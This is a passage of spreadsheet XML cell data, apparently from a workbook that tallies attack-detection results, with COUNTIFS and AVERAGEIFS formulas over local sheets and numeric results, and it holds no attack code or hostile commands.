        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K114)</f>
        <v>0</v>
      </c>
      <c r="O114" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P114" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q114" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T114" s="865" t="s">
        <v>1374</v>
      </c>
      <c r="U114" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V114" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W114" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T114)</f>
        <v>0</v>
      </c>
      <c r="X114" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y114" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z114" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB114" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC114" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD114" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="115">
      <c r="B115" s="806"/>
      <c r="C115" s="806"/>
      <c r="D115" s="871"/>
      <c r="E115" s="871"/>
      <c r="F115" s="871"/>
      <c r="G115" s="871"/>
      <c r="H115" s="806"/>
      <c r="I115" s="806"/>
      <c r="K115" s="352" t="s">
        <v>677</v>
      </c>
      <c r="L115" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="M115" s="374">
        <f>'(D) - Análisis Resultados II - '!BF22</f>
        <v>1</v>
      </c>
      <c r="N115" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K115)</f>
        <v>1</v>
      </c>
      <c r="O115" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P115" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q115" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T115" s="865" t="s">
        <v>677</v>
      </c>
      <c r="U115" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="V115" s="69">
        <v>1.0</v>
      </c>
      <c r="W115" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T115)</f>
        <v>1</v>
      </c>
      <c r="X115" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y115" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z115" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB115" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC115" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD115" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="116">
      <c r="B116" s="806"/>
      <c r="C116" s="806"/>
      <c r="D116" s="871"/>
      <c r="E116" s="871"/>
      <c r="F116" s="871"/>
      <c r="G116" s="871"/>
      <c r="H116" s="806"/>
      <c r="I116" s="806"/>
      <c r="K116" s="352" t="s">
        <v>790</v>
      </c>
      <c r="L116" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M116" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BG22</f>
        <v>-</v>
      </c>
      <c r="N116" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K116)</f>
        <v>0</v>
      </c>
      <c r="O116" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P116" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q116" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T116" s="865" t="s">
        <v>790</v>
      </c>
      <c r="U116" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V116" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W116" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T116)</f>
        <v>0</v>
      </c>
      <c r="X116" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y116" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z116" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB116" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC116" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD116" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="117">
      <c r="B117" s="806"/>
      <c r="C117" s="806"/>
      <c r="D117" s="871"/>
      <c r="E117" s="871"/>
      <c r="F117" s="871"/>
      <c r="G117" s="871"/>
      <c r="H117" s="806"/>
      <c r="I117" s="806"/>
      <c r="K117" s="352" t="s">
        <v>262</v>
      </c>
      <c r="L117" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BS$131)
</f>
        <v>1</v>
      </c>
      <c r="M117" s="374">
        <f>'(D) - Análisis Resultados II - '!BH22</f>
        <v>0</v>
      </c>
      <c r="N117" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K117)</f>
        <v>1</v>
      </c>
      <c r="O117" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P117" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q117" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T117" s="865" t="s">
        <v>262</v>
      </c>
      <c r="U117" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BS$131)
</f>
        <v>1</v>
      </c>
      <c r="V117" s="69">
        <v>0.0</v>
      </c>
      <c r="W117" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T117)</f>
        <v>1</v>
      </c>
      <c r="X117" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y117" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z117" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB117" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC117" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD117" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="118">
      <c r="B118" s="806"/>
      <c r="C118" s="806"/>
      <c r="D118" s="871"/>
      <c r="E118" s="871"/>
      <c r="F118" s="871"/>
      <c r="G118" s="871"/>
      <c r="H118" s="806"/>
      <c r="I118" s="806"/>
      <c r="K118" s="352" t="s">
        <v>771</v>
      </c>
      <c r="L118" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M118" s="374">
        <f>'(D) - Análisis Resultados II - '!BI22</f>
        <v>1</v>
      </c>
      <c r="N118" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K118)</f>
        <v>1</v>
      </c>
      <c r="O118" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P118" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q118" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T118" s="865" t="s">
        <v>771</v>
      </c>
      <c r="U118" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V118" s="69">
        <v>0.0</v>
      </c>
      <c r="W118" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T118)</f>
        <v>1</v>
      </c>
      <c r="X118" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y118" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z118" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB118" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC118" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD118" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="119">
      <c r="B119" s="806"/>
      <c r="C119" s="806"/>
      <c r="D119" s="576" t="s">
        <v>2766</v>
      </c>
      <c r="E119" s="221"/>
      <c r="F119" s="221"/>
      <c r="G119" s="222"/>
      <c r="H119" s="806"/>
      <c r="I119" s="806"/>
      <c r="K119" s="352" t="s">
        <v>724</v>
      </c>
      <c r="L119" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M119" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BJ22</f>
        <v>-</v>
      </c>
      <c r="N119" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K119)</f>
        <v>0</v>
      </c>
      <c r="O119" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P119" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q119" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T119" s="865" t="s">
        <v>724</v>
      </c>
      <c r="U119" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V119" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W119" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T119)</f>
        <v>0</v>
      </c>
      <c r="X119" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y119" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z119" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB119" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC119" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD119" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="120">
      <c r="B120" s="806"/>
      <c r="C120" s="806"/>
      <c r="D120" s="871" t="s">
        <v>2767</v>
      </c>
      <c r="F120" s="871" t="s">
        <v>2768</v>
      </c>
      <c r="H120" s="806"/>
      <c r="I120" s="806"/>
      <c r="K120" s="352" t="s">
        <v>211</v>
      </c>
      <c r="L120" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BV$131)
</f>
        <v>0</v>
      </c>
      <c r="M120" s="374">
        <f>'(D) - Análisis Resultados II - '!BK22</f>
        <v>0</v>
      </c>
      <c r="N120" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K120)</f>
        <v>1</v>
      </c>
      <c r="O120" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P120" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q120" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T120" s="865" t="s">
        <v>211</v>
      </c>
      <c r="U120" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BV$131)
</f>
        <v>0</v>
      </c>
      <c r="V120" s="69">
        <v>0.0</v>
      </c>
      <c r="W120" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T120)</f>
        <v>1</v>
      </c>
      <c r="X120" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y120" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z120" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB120" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC120" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD120" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="121">
      <c r="B121" s="806"/>
      <c r="C121" s="806"/>
      <c r="D121" s="871">
        <f>COUNTIF('(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>98</v>
      </c>
      <c r="F121" s="871">
        <f>COUNTIF('(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>39</v>
      </c>
      <c r="H121" s="806"/>
      <c r="I121" s="806"/>
      <c r="K121" s="352" t="s">
        <v>805</v>
      </c>
      <c r="L121" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BW$131)
</f>
        <v>1</v>
      </c>
      <c r="M121" s="374">
        <f>'(D) - Análisis Resultados II - '!BL22</f>
        <v>1</v>
      </c>
      <c r="N121" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K121)</f>
        <v>1</v>
      </c>
      <c r="O121" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P121" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q121" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T121" s="865" t="s">
        <v>805</v>
      </c>
      <c r="U121" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BW$131)
</f>
        <v>1</v>
      </c>
      <c r="V121" s="69">
        <v>1.0</v>
      </c>
      <c r="W121" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T121)</f>
        <v>1</v>
      </c>
      <c r="X121" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y121" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z121" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB121" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC121" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD121" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="122">
      <c r="B122" s="806"/>
      <c r="C122" s="806"/>
      <c r="D122" s="871" t="s">
        <v>2769</v>
      </c>
      <c r="F122" s="871" t="s">
        <v>2770</v>
      </c>
      <c r="H122" s="806"/>
      <c r="I122" s="806"/>
      <c r="K122" s="352" t="s">
        <v>932</v>
      </c>
      <c r="L122" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M122" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BM22</f>
        <v>-</v>
      </c>
      <c r="N122" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K122)</f>
        <v>0</v>
      </c>
      <c r="O122" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P122" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q122" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T122" s="865" t="s">
        <v>932</v>
      </c>
      <c r="U122" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V122" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W122" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T122)</f>
        <v>0</v>
      </c>
      <c r="X122" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y122" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z122" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB122" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC122" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD122" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="123">
      <c r="B123" s="806"/>
      <c r="C123" s="806"/>
      <c r="D123" s="871">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!AG3:AG139,"LV1",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>61</v>
      </c>
      <c r="F123" s="871">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!AG3:AG139,"LV2",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>27</v>
      </c>
      <c r="H123" s="806"/>
      <c r="I123" s="806"/>
      <c r="K123" s="352" t="s">
        <v>1306</v>
      </c>
      <c r="L123" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="M123" s="374">
        <f>'(D) - Análisis Resultados II - '!BN22</f>
        <v>1</v>
      </c>
      <c r="N123" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K123)</f>
        <v>2</v>
      </c>
      <c r="O123" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P123" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q123" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T123" s="865" t="s">
        <v>1306</v>
      </c>
      <c r="U123" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="V123" s="69">
        <v>1.0</v>
      </c>
      <c r="W123" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T123)</f>
        <v>2</v>
      </c>
      <c r="X123" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y123" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z123" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB123" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC123" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD123" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="124">
      <c r="B124" s="806"/>
      <c r="C124" s="806"/>
      <c r="D124" s="871" t="s">
        <v>2771</v>
      </c>
      <c r="E124" s="872">
        <f>D121/(D121+F121)</f>
        <v>0.7153284672</v>
      </c>
      <c r="G124" s="872"/>
      <c r="H124" s="806"/>
      <c r="I124" s="806"/>
      <c r="K124" s="352" t="s">
        <v>1903</v>
      </c>
      <c r="L124" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="M124" s="374">
        <f>'(D) - Análisis Resultados II - '!BO22</f>
        <v>0</v>
      </c>
      <c r="N124" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K124)</f>
        <v>1</v>
      </c>
      <c r="O124" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P124" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q124" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T124" s="865" t="s">
        <v>1903</v>
      </c>
      <c r="U124" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="V124" s="69">
        <v>0.0</v>
      </c>
      <c r="W124" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T124)</f>
        <v>1</v>
      </c>
      <c r="X124" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y124" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z124" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB124" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC124" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD124" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="125">
      <c r="B125" s="806"/>
      <c r="C125" s="806"/>
      <c r="D125" s="871" t="s">
        <v>2772</v>
      </c>
      <c r="E125" s="872">
        <f>1-E124</f>
        <v>0.2846715328</v>
      </c>
      <c r="G125" s="871"/>
      <c r="H125" s="806"/>
      <c r="I125" s="806"/>
      <c r="K125" s="352" t="s">
        <v>2335</v>
      </c>
      <c r="L125" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M125" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BP22</f>
        <v>-</v>
      </c>
      <c r="N125" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K125)</f>
        <v>0</v>
      </c>
      <c r="O125" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P125" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q125" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T125" s="865" t="s">
        <v>2335</v>
      </c>
      <c r="U125" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V125" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W125" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T125)</f>
        <v>0</v>
      </c>
      <c r="X125" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y125" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z125" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB125" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC125" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD125" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="126">
      <c r="B126" s="806"/>
      <c r="C126" s="806"/>
      <c r="F126" s="871"/>
      <c r="G126" s="871"/>
      <c r="H126" s="806"/>
      <c r="I126" s="806"/>
      <c r="K126" s="352" t="s">
        <v>1983</v>
      </c>
      <c r="L126" s="867">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CB$131)
</f>
        <v>0</v>
      </c>
      <c r="M126" s="374">
        <f>'(D) - Análisis Resultados II - '!BQ22</f>
        <v>0</v>
      </c>
      <c r="N126" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K126)</f>
        <v>1</v>
      </c>
      <c r="O126" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P126" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q126" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T126" s="865" t="s">
        <v>1983</v>
      </c>
      <c r="U126" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CB$131)
</f>
        <v>0</v>
      </c>
      <c r="V126" s="69">
        <v>1.0</v>
      </c>
      <c r="W126" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T126)</f>
        <v>1</v>
      </c>
      <c r="X126" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y126" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
